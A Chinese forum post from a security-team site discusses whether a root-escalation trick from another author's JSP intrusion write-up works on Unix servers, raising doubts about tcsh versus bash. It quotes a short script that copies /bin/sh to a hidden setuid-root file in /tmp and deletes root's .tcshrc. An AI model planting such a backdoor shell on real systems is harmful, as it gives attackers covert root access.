[讨论]由pingping的JSP入侵中 关于*nix得到root的问题？

文章作者：抽烟的男人
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

关于pingping在JSP入侵时，在*nix下得到root的过程中，我觉得应该独立出来讨论一下。
现在的服务器越来越多使用*NIX系统了。
在pingping的文章中，在MYSQL中建立表并输入如下内容:
#!/bin/sh
cp  /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
这里小弟有几个疑问。
在如何攻破www.apache.org中，apache中使用的是freebsd,小弟对freebsd不了解。但个人觉得问题还是存在的。
1：.tcshrc说明root使用的shell是tcsh，这样才会执行.tcshrc,但要是在/root目录下本身就有一个.tcshrc，在LINUX中一般都是配置了root变量环境，如ls显示的色彩，要是这样执行的话，那只要root用户一登陆就会发现.tcshrc被更改了。那一切也就OVER了。我不知道freebsd是怎么样的，熟悉的朋友能否说一下。
2：如果root的使用的不是tcsh,是KSH或者是BASH，那么用上面的方法是不可能成功的，至少在LINUX下是不能的。不知道PINGPING说的在LINUX实验成功是在什么环境下？而且LINUX下一般使用的都是BASH，至少我用的RH，GENTOO，DEBIAN，MDK采用的都是BASH。

<<<文章有错误----删除部分内容>>>